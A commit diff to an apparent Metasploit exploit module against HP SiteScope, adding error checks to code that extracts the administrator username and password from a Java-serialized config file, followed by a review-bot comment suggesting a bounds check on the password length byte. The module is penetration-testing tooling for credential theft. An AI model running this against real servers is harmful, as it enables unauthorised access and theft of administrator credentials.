add some checks while parsing the java serialization config file
parent
b2116e2394
commit
2f87af1c3a
|
@ -91,9 +91,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
admin_data = conf.split("\x03\x5F\x69\x64\x74\x00\x0D\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F\x72\x74\x00")[1]
|
admin_data = conf.split("\x03\x5F\x69\x64\x74\x00\x0D\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F\x72\x74\x00")[1]
|
||||||
|
|
||||||
admin_password = admin_data.split(/\x09_passwordt\x00/)[1]
|
if not admin_data or admin_data.empty?
|
||||||
password_length = admin_password.unpack("C").first
|
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
admin_password = admin_data.split(/\x09_passwordt\x00/)[1]
|
||||||
|
|
||||||
|
if not admin_password or admin_password.empty?
|
||||||
|
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
password_length = admin_password.unpack("C").first
|
||||||
if password_length > 0
|
if password_length > 0
|
||||||
password = admin_password[1, password_length]
|
password = admin_password[1, password_length]
|
||||||
else
|
else
|
||||||
|
@ -102,7 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
admin_user_type, admin_user = admin_password.split(/\x06(_login[q|t])\x00/)[1, 2]
|
admin_user_type, admin_user = admin_password.split(/\x06(_login[q|t])\x00/)[1, 2]
|
||||||
|
|
||||||
|
if not admin_user_type or admin_user_type.empty?
|
||||||
|
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
if admin_user_type == "_logint"
|
if admin_user_type == "_logint"
|
||||||
|
if not admin_user or admin_user.empty?
|
||||||
|
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
user_length = admin_user.unpack("C").first
|
user_length = admin_user.unpack("C").first
|
||||||
else
|
else
|
||||||
user_length = 0
|
user_length = 0
|
||||||
|
|
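Review bot: The length byte is still trusted after these guards: in the first hunk `password = admin_password[1, password_length]` silently returns a shorter string when fewer than `password_length` bytes follow it, so a truncated or unexpected config is reported as a valid credential instead of reaching the new error path. A bounds test before the slice, e.g. `if admin_password.length < password_length + 1` followed by the same `print_error`/`return`, would close that gap. `user_length` in the second hunk presumably needs the same treatment where it is consumed, which is outside the visible lines. The four guards also print an identical message, so naming the field that failed (administrator record, password, login type, login) would make a failed parse diagnosable. Both `if`/`else` blocks continue past the end of their hunks.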